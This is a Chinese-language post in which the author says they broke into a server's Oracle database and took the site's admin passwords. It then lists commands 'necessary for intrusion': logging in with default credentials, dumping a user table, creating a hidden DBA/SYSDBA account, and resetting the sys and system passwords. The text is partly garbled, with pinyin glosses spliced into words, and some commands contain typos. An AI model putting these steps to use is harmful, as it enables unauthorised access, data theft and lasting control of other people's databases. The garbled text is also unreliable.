最近遇到一個使用了Oracle數(shù)據(jù)庫的服務器,在狂學Oracle+請教高手后終于搞到了網(wǎng)站后臺管理界面的所有用戶密碼,我發(fā)現(xiàn)Oracle操作起來真是太麻煩,為了兄弟們以后少走些彎路,我把入侵當中必需的命令整理出來,一個星期的心血,版權所有,轉載請注明作者。
1、su – oracle 不是必需,適合于沒有DBA密碼時使用,可以不用密碼來進入sqlplus界面。
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
3、SQL>connect / as sysdba ;(as sysoper)或 connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4、SQL>startup; 啟動數(shù)據(jù)庫實例
5、查看當前的所有數(shù)據(jù)庫
select * from v$database;
select name from v$database;
desc v$databases; 查看數(shù)據(jù)庫結構字段
6、怎樣查看哪些用戶擁有SYSDBA、SYSOPER權限
SQL>select * from V_$PWFILE_USERS;
Show user;查看當前數(shù)據(jù)庫連接用戶
7、進入test數(shù)據(jù)庫:database test;
8、查看所有的數(shù)據(jù)庫實例:
select * from v$instance;
如:ora9i
9、查看當前庫的所有數(shù)據(jù)表:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
_default_auditing_options_
10、查看表結構:desc all_tables;
11、顯示CQI.T_BBS_XUSER的所有字段結構:
desc CQI.T_BBS_XUSER;
12、獲得CQI.T_BBS_XUSER表中的記錄:
select * from CQI.T_BBS_XUSER;
13、增加數(shù)據(jù)庫用戶:(test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
14、用戶授權
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
15、更改數(shù)據(jù)庫用戶的密碼:(將sys與system的密碼改為test.)
alter user sys indentified by test;
alter user system indentified by test;
更多信息請查看IT技術專欄